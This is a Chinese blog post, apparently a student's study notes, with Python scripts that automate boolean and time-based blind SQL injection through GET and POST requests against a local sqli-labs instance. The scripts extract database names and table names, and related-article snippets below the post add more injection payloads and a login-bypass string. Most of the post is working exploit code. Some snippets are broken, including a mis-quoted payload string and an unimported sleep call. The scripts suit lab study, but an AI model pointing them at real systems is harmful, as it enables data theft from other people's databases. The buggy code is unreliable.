sql注入自动化脚本POST和GET型

最新推荐文章于 2024-11-13 10:59:25 发布
最新推荐文章于 2024-11-13 10:59:25 发布
阅读量355 收藏 6
点赞数 3
文章标签: sql 自动化 python web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129389788
版权

文章目录

sql注入python自动化脚本

GET型

python脚本自动化注入bool盲注爆数据库名:

import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-5/"
right = "You"
# 注意缩写,python缩写
def database_name():
    name = ''
    for i in range(1,100):
        for j in "abcdefghijklmnopqrstuvwxyz":# 爆flag最好用ascii码,防止漏掉特殊字符
            payload = "?id=1" and substr((select database()),%d,1)='%s'--+"% (i,j) 
            r = requests.get(url + payload)
            if right in r.text:
                name += j
                print(name)
database_name()

python在自动化脚本bool时间盲注爆数据库长度与库名:
关于python时间函数的学习

import datetime
import time
now = datetime.datetime.now() #获取当前的时间
sleep(2)
now1 = datetime.datetime.now() #获取两秒后的时间
sec = (now1-now).seconds
   # sec为2
   # seconds获取的是仅仅是时间差的秒数,忽略微秒数,忽略天数。
   # total_seconds()是获取两个时间之间的总差。
now2 = time.time() #获取当前时间
sleep(2)
now3 = time.time()  # 不能用.seconds,因为这个是float型的

import requests
import time
import datetime
url = "http://127.0.0.1/sqli-labs-master/Less-9/"
def get_database_len():
    for i in range(1,20):
        payload  = "?id=1' and sleep(if(length((select database()))=%d,2,0))--+"% (i)
        start = datetime.datetime.now()
        response = requests.get(url+payload)
        end = datetime.datetime.now()
        tt = (end-start).seconds
        if tt >=2:
            print(i)
            return i
def get_database_name():
    number = get_database_len()
    name = ""
    for i in range(1,number+1): # 这个要加1,不然会少爆出一个字母
        for j in range(32,126):
            payload = "?id=1' and sleep(if(ascii(substr((select database()),%d,1))=%d,2,0))--+"%(i,j)
            start = datetime.datetime.now()
            re = requests.get(url+payload)
            end = datetime.datetime.now()
            ttt = (end - start).seconds # 这个用.seconds使其整数化
            if ttt >=2:
                name += chr(j)
                print(name)
get_database_name()
### 有个缺点,速度太慢,可以进行算法优化

POST

1.延时盲注post型

import datetime
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and sleep(if(length((select database()))=%d,3,0))#"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        start = time.time()
        html = requests.post(url=url, data=data)
        end = time.time() # 这里好像只能同time.time()
        ttt = end-start
        if ttt >=2:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and sleep(if(ascii(substr((select database()),%d,1))=%d,3,0))#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start = time.time()
            # print(data)
            html = requests.post(url=url, data=data) 
            end = time.time()
            ttt = end - start
            # print(ttt)
            if ttt >= 2:
                name += chr(j)
                print(name)
get_name_database()
# 一定要注意payload不要写错不然查错要查特别久

2.bool盲注post型

import requests
import re
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and length((select database()))=%d #"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        html = requests.post(url=url, data=data)
        if "flag.jpg" in html.text:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    print(number)
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
                if i == number:
                    return name
                break
def get_name_table():
    name = ""
    result = get_name_database()
    print(result)
    for i in range(1,30):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
get_name_table()
Harder.
关注
SQL注入自动化python脚本
CMACCKK
08-10 3617
写了一个python3注入sql脚本 临近毕业,尝试写一些自动注入和自动扫描的脚本 发现还是不够自动 后面我再改改。现在脖子疼 实现效果 代码如下: import requests from bs4 import BeautifulSoup from colorama import init, Fore, Back, Style import sys import time import urllib.parse import re from prettytable import PrettyTab
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1723
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入。 post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
SQL注入和CSS攻击的检测
10-21 1484
作者:K. K. Mookhey , Nilesh Burghate,翻译:FPX[B.C.T] 1. 介绍在 最后两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有 遵循安全代码进行开发,攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref 1] 和CSS[ref 2] 攻击。
SQL注入获取数据库V1—自动化脚本
weixin_48968378的博客
12-14 1449
1、搭建好python环境,新建一个文件夹将代码复制进文件夹中命名以“.py”结尾,同时新建一个文件cmd.bat文件,文件内容是:cmd.exe 2、双击cmd.bat文件,进入cmd命令界面 3、输入命令 :python sqlbind_v1.py 回车执行 回车执行得数据库名: 获取表名: 字段名: 到此处我们就可以退出了,不用查看字段内容 下面是代码,在执行前一定先去修改payload和标志位,在执行的过程中如果较慢,可以将代码中的httpx请求换成req...
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 877
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
SQL 注入脚本学习笔记
二进制的博客
10-11 1389
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql
php中$_GET与$_POST过滤sql注入的方法
10-25
因此,更加稳妥的做法是使用预处理语句和参数化查询,它们可以有效地隔离SQL语句与数据,从而避免SQL注入。 在本主题中,我们将关注如何使用addslashes_deep函数来过滤$_GET与$_POST数据以防止SQL注入。这个函数...
Sql2005注入辅助脚本[修改版]
10-30
它旨在为渗透测试人员提供一个辅助工具,通过自动化脚本,对目标网站或应用程序进行SQL注入测试,以便发现潜在的安全漏洞。 2.黄瓜修改版: 文档中提到脚本经过“黄瓜”修改,这是一个表明该脚本可能由一个名为...
php防止sql注入示例分析和几种常见攻击正则表达式
12-19
这些正则表达式设计用来匹配SQL注入的常见模式,如单引号、逻辑运算符(AND、OR)、分隔符(>, <, =)、IN、LIKE等关键字,以及SQL注释和脚本标签。 3. **StopAttack函数**: `StopAttack` 函数是用于检查用户输入...
PHP中防止SQL注入攻击和XSS攻击的两个简单方法
12-17
在PHP编程中,确保应用程序的安全性至关重要,尤其是防范SQL注入和跨站脚本(XSS)攻击。这两种攻击方式是Web应用安全领域的常见威胁,能够导致数据泄露、用户信息被窃取甚至完全控制服务器。以下是对这两种攻击的预防...
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
sql注入常用脚本
西部壮仔的博客
10-05 1196
XFF时间盲注二分法 import requests url="http://49.235.141.207:25501/test_sql/sql_ip_insert/" flag='' for i in range(1,50): f1=flag top=127 low=33 while low<=top: mid=(top+low)//2 p1="127.0.0.1' and (case when ascii(substr((selec
注入脚本
weixin_34067102的博客
05-22 827
转载于:https://www.cnblogs.com/AtesetEnginner/p/10906975.html
sql注入脚本1
m0_55772907的博客
05-01 1003
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
(手工)【sqli-labs15-16】POST注入:布尔/时间盲注
07-07 1033
SQL-POST】布尔/时间盲注
SQL注入POST注入
studyphp123的博客
04-23 1303
一、预备知识 二、实验目的 三、实验工具 浏览器、Burpsuite 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-11/,页面正常。 第二步:加入单引号会报错。 1)打开 burpsuite,界面如下: 2)打开 Firefox,选项 -> 高级 -> 设置-> 手动配置代理 3)访问 http:/...
常用的SQL注入语句
孤的博客
10-11 2337
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。 每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。 局部变量(Local Variable)和全局变量(Global Varia...
sql注入之二次注入(sqlilabs-less24)
最新发布
CSDNRomance的博客
11-13 519
二阶注入相对隐蔽,因为其恶意代码不会在第一步直接执行,所以在开发和测试时,务必要考虑输入数据在不同阶段的调用方式,以避免此类攻击。
PHP中POST&GET实现SQL注入Web工具
POST和GET分别用于提交数据和获取页面信息,但它们在安全性、数据可见性和传输量上有所区别。” 在PHP中,POST和GET是两种常见的HTTP请求方法,用于在客户端(如浏览器)和服务器之间交换数据。POST方法通常用于向...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值